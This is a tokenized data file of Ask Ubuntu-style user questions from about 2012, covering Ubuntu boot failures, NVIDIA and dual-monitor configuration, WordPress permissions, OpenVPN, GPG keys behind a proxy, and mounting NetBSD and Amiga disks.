147279	`` importerror : no module named peppermint '' after installing ice from peppermint	software center is not opening since i installed `` ice '' software ( used in peppermint os ) from ppa : kendalltweaver/peppermint and i keep getting this error - $ software-center error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 3 , in < module > from debfile import debfileapplication file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 28 , in < module > from softwarecenter.backend.channel import is_channel_available file `` /usr/share/software-center/softwarecenter/backend/channel.py '' , line 25 , in < module > from softwarecenter.distro import get_distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 194 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 169 , in _get_distro module = __import__ ( distro_id , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named peppermint
147282	require assistance with failed to open stream : permission denied in	i have set up ( actually migrated ) wordpress on ubuntu 10.04 with apache2 and everything works great . however , i 'm getting the following error when using a plugin to upload files to the server : [ wed jun 06 13:12:29 2012 ] [ error ] [ client xx.xxx.xxx.xxx ] php warning : fopen ( /home/user/public/website.com/public/wp-content/plugins/cforms/abspath.php ) : failed to open stream : permission denied in /home/user/public/website.com/public/wp-content/plugins/cforms/lib_functions.php on line 164 , referer : http : //website.com/wp-admin/plugins.php ? deactivate=true & plugin_status=all & paged=1 & s= i 've taken a bit too much on i think . i 'm not a developer at all , but i thought it would be fun to try and set myself up with a linode vps . i suspect that there is some sort of permissions problem . www-data is my php user . could it be that www-data is lacking permissions ? and how do i go about troubleshooting this ? any help is greatly appreciated .
147283	nvidia plugin for conky	i want to display gpu speed , memory , and temperature on my conky configuration . on the conky site it says you can use $ { nvidia temp } 째c to show it . however , when this happens , it takes it as litteral text . i 've read a bit , and it looks like i 'm missing a plugin or something . some sources say to install nvidia-settings which i 've already had installed . ( ps i have a gefore 360m ) i was able to get a temp reading as you can see in the top of this picture . i used a long line of code $ { execi 60 nvidia-settings -query gpucoretemp | perl -ne 'print $ 1 if /gpucoretemp.* ? : ( \d+ ) ./ ; ' } 째c but the conky objects are much cleaner , and i 'd like to just be able to use them instead . does anyone know how i can get this working ? ( see video section ) here 's the code for the video section ... $ { font arial : bold : size=10 } $ { color white } video $ { color darkslategray } $ { hr 2 } $ font $ { color dimgray } nvidia geforce 360m gpu $ alignr $ { nvidia gpufreq } mhz memory $ alignr $ { nvidia memfreq } mhz temperature $ alignr $ { nvidia temp } mhz
147284	libreoffice pdf exporting issue - transparent objects	when i export my presentation to pdf the first slide , whose master slide has a white and transparent field turns black and transparent . anybody has an idea what is going on ?
147285	unable to boot into ubuntu 12.04	when i boot ubuntu , it asks me if i want generic version , or recovery mode . i choose generic mode and it goes straight to a purple screen and does n't do anything else . i love using ubuntu , but now i ca n't : (
147297	ubuntu installer	today i 'm gon na download ubuntu installer and install it alongside windows 7 . do n't know why , but after clicking the button ( start download ) nothing is gon na happen . tryed that via google chrome and mozilla firefox . can anyone give staight link ? thank u in advance , and sry for my english : d
147299	how to make a shortcut under ubuntu ?	i use ubuntu 12.04 with unity , i want to map may own hot key in order to quick launcher , for example , i can run ctrl+alt+t to run terminal , can i run ctrl+e to launch emacs ?
147300	help connecting openvpn in ubuntu 12.04	i 'm new in ubuntu and would like to know if there exist a complete step by step tutorial on how to set up an openvpn connection . i am hoping that it would be as easy as doing it in windows 7 . i have .ovpn files that i want to use . are there any packages that i require ? is there an existing gui for connecting to openvpn or am i expected to go through the terminal and be knowledgeable about certain commands ? i hope you can help me out ! : )
147308	nvidia dual monitor set-up 11.04	i am running ubuntu 11.04 . i have an nvidia geforce gtx 295 card installed with driver version 295.53 installed . i had struggled with this for a while a few weeks ago , and gave up . however , last week , i came into work , and noticed both monitors were working . i thought one of my tech buddies helped me out ( we are a small company , and i just spoke with him today . he thought it was still not working ) so i went on my merry way happy that i had dual monitor support . unfortunately , i crashed ( tried to compile a program while running a large virtual box ) the computer yesterday , and when it came back up , i was back to a single monitor again . i had not changed any settings or files related to any software installed . tl ; dr : dual monitor support started working out of the blue , and upon reboot , disappears . any thoughts on where to go ? a few notes : i understand about duplicate questions . i have tried a number of solutions from a wide range of websites , including this one , but none of them seem to help , or be relevant to my situation . my xorg.conf file is as follows ( which i assume was the correct mix of settings ) : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 295.53 ( buildmeister @ swio-display-x86-rhel47-07.nvidia.com ) sat may 12 00:34:20 pdt 2012 # section `` monitor '' # identifier `` monitor2 '' # vendorname `` unknown '' # modelname `` unknown '' # horizsync 28.0 - 33.0 # vertrefresh 43.0 - 72.0 # option `` dpms '' # endsection # section `` device '' # identifier `` device0 '' # driver `` nvidia '' # vendorname `` nvidia corporation '' # boardname `` geforce gtx 295 '' # busid `` pci:4:0:0 '' # endsection # section `` screen '' # identifier `` screen1 '' # device `` device1 '' # monitor `` monitor1 '' # defaultdepth 24 # option `` twinview '' `` true '' # option `` metamodes '' `` nvidia-auto-select , nvidia-auto-select '' # subsection `` display '' # depth 24 # endsubsection # endsection # section `` screen '' # identifier `` screen2 '' # device `` device2 '' # monitor `` monitor2 '' # defaultdepth 24 # option `` twinview '' `` true '' # option `` metamodes '' `` nvidia-auto-select , nvidia-auto-select '' # subsection `` display '' # depth 24 # endsubsection # endsection section `` serverlayout '' # screen 1 `` screen1 '' rightof `` screen0 '' # screen 2 `` screen2 '' rightof `` screen1 '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 295 '' busid `` pci:5:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 295 '' busid `` pci:4:0:0 '' endsection section `` screen '' # option `` twinview '' `` true '' # option `` metamodes '' `` nvidia-auto-select , nvidia-auto-select '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` true '' option `` metamodes '' `` nvidia-auto-select , nvidia-auto-select '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # option `` twinview '' `` true '' # option `` metamodes '' `` nvidia-auto-select , nvidia-auto-select '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` true '' option `` metamodes '' `` nvidia-auto-select , nvidia-auto-select '' subsection `` display '' depth 24 endsubsection endsection
147309	how to make chrome history in hud bigger ?	i was looking for a way to enlarge the history - section in the hud ( alt-menu ) , so that it displays more items from the history and items from longer ago . thanks !
147310	which options of libreoffice impress are unreadable ?	could anyone tell me what is unreadable in this german version of libreoffice impress ( 3.5 ) ? just go to file â export to pdf : it is impossible to change the windows size to unveil it ( bug report ) . at least i can check this option ...
147311	no gpg key from behind a firewall	just stumbled over this closed thread here : gpg error while running apt-get same problem here , ubuntu 12.04 behind a firewall and proxy . i dont think that matter is duplicate of the given topic . so i reopen this matter in this thread . my output : root @ musik-aspire-7741 : ~ # apt-key adv -- keyserver hkp : //keyserver.ubuntu.com:80 -- recv-keys 58b98e87 executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret- keyring /tmp/tmp.twvmhyimyh -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80 -- recv-keys 58b98e87 gpg : key 58b98e87 of hkp server keyserver.ubuntu.com request ? : keyserver.ubuntu.com : connection refused gpgkeys : http fetch error 7 : could n't connect : connection refused gpg : no valid openpgp data found . gpg : total number processed : 0 conclusion : gpg is not working with hkp : //keyserver.ubuntu.com:80 via http .
147313	unable to run ubuntu 12.04 without usb flash drive	yesterday i installed ubuntu from a usb flash drive . now , when i turn on my notebook , it displays only _ . when insert the usb drive it 's ok . i tried changing bios settings : some booting options , but it did n't help . what should i do to make it possible to run without the usb flash drive ? thanks in advance : ) thanks but it did n't work properly . boot repair wrote `` efi detected . please check the options . '' i do n't know if it 's important ... after command sudo fdisk /dev/sda it answered : command ( m for help ) : m command action a toggle a bootable flag b edit bsd disklabel c toggle the dos compatibility flag d delete a partition l list known partition types m print this menu n add a new partition o create a new empty dos partition table p print the partition table q quit without saving changes s create a new empty sun disklabel t change a partition 's system id u change display/entry units v verify the partition table w write table to disk and exit x extra functionality ( experts only ) command ( m for help ) : so i chose sda . then it said something like if any problems - http : //paste.ubuntu.com/1027567/ or boot.repair @ gmail.com or my favourite discuss forum . then : you can now reboot your computer . please do not forget to make your bios boot on sda disk ! what has happened ? what should i do ? it again was n't able to run without usb . thank you
147315	do i buy a game twice if i bought it from humblebundle.com ?	i bought a series of games on humblebundle.com , and i decided to install them on ubuntu software center . i am wondering if i also paid for the games on software center , since it said 'loading payment service . ' does anyone know wether i bought the game twice or not ? thanks !
147319	how can i give other drives and partitions short , meaningful names in nautilus ?	in nautilus and unity the external drive has a nice short descriptive name `` mcat '' , but all partitions on the 4 internal drives are displayed as a size ( 834 gb filesystem ) or a huge 32-character string form of a guid : i 'm guessing the external drive is nice , short , sweet and readable because that drive may have no partitions ( well , just one i guess ) and that name may be the drive label , whereas partitions usually do n't have names . that may explain my problem , but does n't solve it . is there some way to give reasonable names to these partitions in nautilus and unity ?
147321	how to impove ubuntu performance on netbook	most recent ubuntu 12.04 seems to be quite nice and unity ( 3d/2d ) works fine for me , however not on my old acer aspire one any more . there was a times , when i switched from windows xp to ubuntu and was happy about system looks , effects and speed ... now i attend to think that xp was really great comparing with 12.04 . i have found similar questions here but no reasonable answer : how to lower cpu usage for unity ( 3d/2d ) and memory consumption for ubuntu 12.04 . with new interface i could not find how to disable background services ... it 's linux , it 's should be the way to optimize without buying new pc ... please share your recipe !
147326	how to fix black screen booting ubuntu 12.04 after broken package problem ?	i installed ppa package for bitdefender but somehow the package got broken . because of this i was not able to boot ubuntu in normal mode . so i booted in recovery mode and completely removed the broken package using synaptic package manager . but even after removing the broken package i 'm unable to boot in normal mode . everytime i try to boot in normal mode i 'm greeted with a black screen ! is there any way to fix this ?
147330	ubuntu 12.04 does n't resume after install nvidia drivers	i 've install the nvidia drivers from the `` additional drivers '' menu in the settings , and when i try to resume from suspend , i get black screen and i have to reboot for solve it . how can i fix it ? it 's very important to me , thanks ! !
147331	matlab 2012a install on ubuntu 12.04 64 bit cant specify license file	[ edit ] the bug/error was the person sitting in front of my computer.. me.. go to a more relevant question.. during installation of matlab 2012a i need to specify my license file but even though i mark the ratio button saying i have the file installation key for my license i 'm not able to type any text into the text field . since everything else is working i suspect that it is java or the fact that my ubuntu is 64 bit that causes the problem.. so it might not be directly matlab related . java -version says : java version `` 1.6.0_24 '' openjdk runtime environment ( icedtea6 1.11.1 ) ( 6b24-1.11.1-4ubuntu3 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) anybody having any suggestions ?
147333	what do the updates do ?	i am using xubuntu . what do the updates do ? i do not notice any difference after an update . the descriptions do not really them me and they benefit me . a way to find out what each update does is as good as an answer , since i assume that the updates do not all do the same thing . -- update -- also , what is the best way to figure what each update does ( like a meaningful summary of each individually . ) just edit the already accepted answer .
147334	show all pictures recursively ( include any subfolders )	does anyone know an app that allows to get an overview about all pictures of a folder , including all subfolders ? i would like to browse through my filesystem and then have an overview of all pictures of the current folder , like adobe bridge ( on a mac ) .
147339	why is my internet connection randomly dropping ?	ever since i have installed 12.04 ( clean install not an upgrade ) , i have been having a drop in the internet connection . the drop in the connection can be anything from 15 seconds to about 3 mins , and then the connection comes back . this behaviour happens while i am actively browsing the internet , or if i wake up the computer and open firefox ( sometimes i have connection and sometimes i do n't ) . please note that when the internet connection is on , it is not slow ( as speedtest.net results show ) . in the beginning , i thought it was a problem with the driver r8169 for my rtl8111/8168b ethernet card , so i downloaded the r8168 from realtek website , followed the detailed instructions ( blacklisted r8169 , changed the file to .bsh ... ) , but still the same problem persisted . so i switched to a wireless connection , and i got the same problem with internet connection dropping randomly . any ideas ? thanks in advance . output from lspci -v : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) subsystem : dell device 04a7 flags : bus master , fast devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : f8000000-fa0fffff prefetchable memory behind bridge : 00000000d0000000-00000000dbffffff capabilities : [ 88 ] subsystem : dell device 04a7 capabilities : [ 80 ] power management version 3 capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ a0 ] express root port ( slot+ ) , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 140 ] root complex link kernel driver in use : pcieport kernel modules : shpchp 00:01.1 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : f4000000-f60fffff prefetchable memory behind bridge : 00000000c0000000-00000000cbffffff capabilities : [ 88 ] subsystem : dell device 04a7 capabilities : [ 80 ] power management version 3 capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ a0 ] express root port ( slot+ ) , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 140 ] root complex link kernel driver in use : pcieport kernel modules : shpchp 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) subsystem : dell device 04a7 flags : bus master , fast devsel , latency 0 , irq 52 memory at f6108000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : [ 50 ] power management version 3 capabilities : [ 8c ] msi : enable+ count=1/1 maskable- 64bit+ kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 04a7 flags : bus master , medium devsel , latency 0 , irq 16 memory at f6107000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) subsystem : dell device 04a7 flags : bus master , fast devsel , latency 0 , irq 53 memory at f6100000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 130 ] root complex link kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 memory behind bridge : fa400000-fa4fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : dell device 04a7 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 0000c000-0000cfff prefetchable memory behind bridge : 00000000dc100000-00000000dc1fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : dell device 04a7 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=0 i/o behind bridge : 0000b000-0000bfff memory behind bridge : fa300000-fa3fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : dell device 04a7 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=06 , subordinate=06 , sec-latency=0 i/o behind bridge : 0000a000-0000afff memory behind bridge : fa200000-fa2fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : dell device 04a7 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 04a7 flags : bus master , medium devsel , latency 0 , irq 23 memory at f6106000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation p67 express chipset family lpc controller ( rev 05 ) subsystem : dell device 04a7 flags : bus master , medium devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > kernel modules : itco_wdt 00:1f.2 raid bus controller : intel corporation 82801 sata controller [ raid mode ] ( rev 05 ) subsystem : dell device 04a7 flags : bus master , 66mhz , medium devsel , latency 0 , irq 42 i/o ports at f070 [ size=8 ] i/o ports at f060 [ size=4 ] i/o ports at f050 [ size=8 ] i/o ports at f040 [ size=4 ] i/o ports at f020 [ size=32 ] memory at f6105000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 70 ] power management version 3 capabilities : [ a8 ] sata hba v1.0 capabilities : [ b0 ] pci advanced features kernel driver in use : ahci 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) subsystem : dell device 04a7 flags : medium devsel , irq 5 memory at f6104000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at f000 [ size=32 ] kernel modules : i2c-i801 01:00.0 vga compatible controller : nvidia corporation device 0dc5 ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : nvidia corporation device 085b flags : bus master , fast devsel , latency 0 , irq 16 memory at f8000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=128m ] memory at d8000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at e000 [ size=128 ] expansion rom at fa000000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 ] virtual channel capabilities : [ 128 ] power budgeting < ? > capabilities : [ 600 ] vendor specific information : id=0001 rev=1 len=024 < ? > kernel driver in use : nouveau kernel modules : nouveau , nvidiafb 01:00.1 audio device : nvidia corporation gf106 high definition audio controller ( rev a1 ) subsystem : nvidia corporation device 085b flags : bus master , fast devsel , latency 0 , irq 17 memory at fa080000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 02:00.0 vga compatible controller : nvidia corporation device 0dc5 ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : nvidia corporation device 085b flags : bus master , fast devsel , latency 0 , irq 17 memory at f4000000 ( 32-bit , non-prefetchable ) [ size=32m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=128m ] memory at c8000000 ( 64-bit , prefetchable ) [ size=64m ] i/o ports at d000 [ size=128 ] expansion rom at f6000000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 ] virtual channel capabilities : [ 128 ] power budgeting < ? > capabilities : [ 600 ] vendor specific information : id=0001 rev=1 len=024 < ? > kernel driver in use : nouveau kernel modules : nouveau , nvidiafb 02:00.1 audio device : nvidia corporation gf106 high definition audio controller ( rev a1 ) subsystem : nvidia corporation device 085b flags : bus master , fast devsel , latency 0 , irq 18 memory at f6080000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 03:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) ( prog-if 30 [ xhci ] ) subsystem : dell device 04a7 flags : bus master , fast devsel , latency 0 , irq 16 memory at fa400000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ 50 ] power management version 3 capabilities : [ 70 ] msi : enable- count=1/8 maskable- 64bit+ capabilities : [ 90 ] msi-x : enable+ count=8 masked- capabilities : [ a0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number ff-ff-ff-ff-ff-ff-ff-ff capabilities : [ 150 ] latency tolerance reporting kernel driver in use : xhci_hcd 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) subsystem : dell device 04a7 flags : bus master , fast devsel , latency 0 , irq 51 i/o ports at c000 [ size=256 ] memory at dc104000 ( 64-bit , prefetchable ) [ size=4k ] memory at dc100000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 01 capabilities : [ b0 ] msi-x : enable- count=4 masked- capabilities : [ d0 ] vital product data capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 03-00-00-00-68-4c-e0-00 kernel driver in use : r8168 kernel modules : r8168 05:00.0 firewire ( ieee 1394 ) : via technologies , inc. vt6315 series firewire controller ( rev 01 ) ( prog-if 10 [ ohci ] ) subsystem : dell device 04a7 flags : bus master , fast devsel , latency 0 , irq 18 memory at fa300000 ( 64-bit , non-prefetchable ) [ size=2k ] i/o ports at b000 [ size=256 ] capabilities : [ 50 ] power management version 3 capabilities : [ 80 ] msi : enable- count=1/1 maskable+ 64bit+ capabilities : [ 98 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 130 ] device serial number 00-10-dc-ff-ff-cf-56-1a kernel driver in use : firewire_ohci kernel modules : firewire-ohci 06:00.0 sata controller : jmicron technology corp. jmb362 sata controller ( rev 10 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : dell device 04a7 flags : bus master , fast devsel , latency 0 , irq 19 i/o ports at a040 [ size=8 ] i/o ports at a030 [ size=4 ] i/o ports at a020 [ size=8 ] i/o ports at a010 [ size=4 ] i/o ports at a000 [ size=16 ] memory at fa210000 ( 32-bit , non-prefetchable ) [ size=512 ] capabilities : [ 8c ] power management version 3 capabilities : [ 50 ] express legacy endpoint , msi 00 kernel driver in use : ahci note that my wireless card is not showing , i have the ralink 3390 card ( which apparently does not show up on ubuntu for some reason ) , however i am able to connect to wireless network and connect to the internet ( when it is working ) .
147341	big problem : complete computer crash ( no response when booted )	i need your help : i installed ubuntu 12.04 on my computer ( i removed the complete system and installed ubuntu instead ) it said that the bootloader installation failed . so i chose the only partition that existed again . installation succesful . restart your computer . i did this . then it went black when it rebooted ( only a flickering stroke appears ) . no isos are executable . bios > boot device priority says : 1st boot device [ sata : pm-samsung hm ] that was all i can say , please help me !
147343	is there a way to emulate pinch-zoom ?	i 'm looking for a way to emulate pinch zoom in either an android emulator ( android sdk-less desirable ) or a ( preferred ) native ubuntu web browser that i can resize to a specified size for initial testing of html5 applications . this is would be useful for first round testing during cross-platform application development . note : i 'm trying to do this with no real touch-device only a mouse . so the best answer would be something like `` install this chromium plug-in and use this hotkey to set pinch points '' or something similar . we already have this for getting dual mouse working ( thanks amithkk ) . the browser that supports multi-touch is the hard part . something to note is that i start getting screen artifacts using multiple mice via that guide . they 're mild and tolerable , but they are there .
147346	how can i read a netbsd ( ufs filesystem ) disk ?	i tried installing netbsd on another computer as i wanted to learn some bsd-stuff . now i want to mount the disk in ubuntu 12.04 , to be able to exchange files . but nothing i found on google works . any hints for me ? i successfully mounted my windows 7 partition . so at least i know a bit about how mount works . output of sudo fdisk -l shows /dev/sde2 1547186176 2930274303 691544064 a9 netbsd
147348	bugzilla ./testserver.pl failing	root @ kittenstest : /var/www/bugzilla/bugzilla-4.2.1 # ./testserver.pl http : //localhost/bugzilla/bugzilla-4.2.1 test-ok webserver is running under group id in $ webservergroup . test-ok got padlock picture . test-failed webserver is fetching rather than executing cgi files . check the addhandler statement in your httpd.conf file . well then . httpd.conf ( from here [ 2.2.4.1.1 ] ) : < directory /var/www/bugzilla/bugzilla-4.2.1 > addhandler cgi-script .cgi .pl options +indexes +includes +execcgi directoryindex index.cgi allowoverride limit fileinfo indexes < /directory > what am i doing wrong ? i 'm pretty new to this ( first bugzilla install ) , so i 'll appreciate explanation .
147349	how can i mount an amiga ( ffs ) formatted hardrive ?	i have an old harddrive with some amiga stuff i would like to read . i read on canonicals wiki that amiga-ffs harddrives should be mountable in ubuntu - but i had no luck in this . anyone has any hints ?
147351	how can i search a drupal site with the new unity lens ?	i 'm creating a simple unity lense for my college site which is based on drupal , but i do n't know how to adapt this command for drupal api . please help , it 's python . we now create our query url , using the wikipedia opensearch api url = ( `` % s/w/api.php ? action=opensearch & limit=25 & format=json & search= % s '' % ( self.wiki , search ) ) i 'm using template to write lense following wikipedia example http : //developer.ubuntu.com/2012/04/how-to-create-a-wikipedia-unity-lens-for-ubuntu/ . i do n't know python but im familiar with c. this drupal api calling is the only problem i have to successfully develop a lense . please help !
147352	currently what is the best firewall & internet security for ubuntu ?	currently what is the best firewall & internet security for ubuntu ?
147353	can anyone help me through the preparation of eclipse ide for an android developer in ubuntu 12.04 ?	i 'm new to to linux , in this particular case , to ubuntu . i have a small android project i have to finish until this friday and i 'm still stuck with the install and preparing of the development environment . the only thing i did was install the eclipse ide . i 'm still missing the sdk , java and anything else that might be needed . can someone help me through this ? it 's only because i 'm running out of time to develop , or else i would embark on a deeper investigation of this os .
147356	unable to boot from live usb	edit : welp , i re-made the live usb and now it works fine . thanks for the replies ! another computing lesson learned the hard way . i was messing around with my new dual-boot ( win7 and the latest ubuntu , 12.04 i think ? ) , and i deleted some partitions that i should n't have . when i boot up the machine , i get : error : no such partition . grub rescue > _ i know that i could probably fix this by booting from the live usb . but i ca n't boot from the live usb either ! on startup , i can get `` boot from drive '' options by pressing f12 . ( this is how i installed ubuntu in the first place . ) but when i select the usb drive , i get this error : error : no such device : [ long string of letters and numbers ] . grub rescue > _ i 've searched around for a fix but most threads addressing the first problem suggest booting from live drive . and i ca n't do that ! any help much appreciated .
147366	how to get an original cd of ubuntu ?	boa tarde , sou fã do ubuntu a muito tempo gostaria de conseguir um cd original e um manual de como instalar programas manualmente . abraços e parabéns pelo belo trabalho a cada versão lancada . english : good afternoon , i 'm a fan of ubuntu a long time i would get an original cd and a manual on how to install programs manually . hugs and congratulations for the beautiful work every release .
147367	recover data from a fat32 hard disk ?	i have connected a failed hard disk which has a detectable fat32 filesystem . i dont know the nature of the damage . what is the easiest way to recover the data from the drive ?
147369	how do i install amnesia ?	i downloaded the game amnesia in the ubuntu software center , it passed 2 hours for install it and i resolved to canceled it , and tried to uninstall it but with no luck , the game stayed there after 2 or 3 reboots . i then went to the software repository and erased the data in other software , after that the u.s.c don t start giving the message : `` the package amnesia needs to be reinstalled , but i can t find an achive for it '' . i tried the synaptic package manager and update by command console but whith no success .
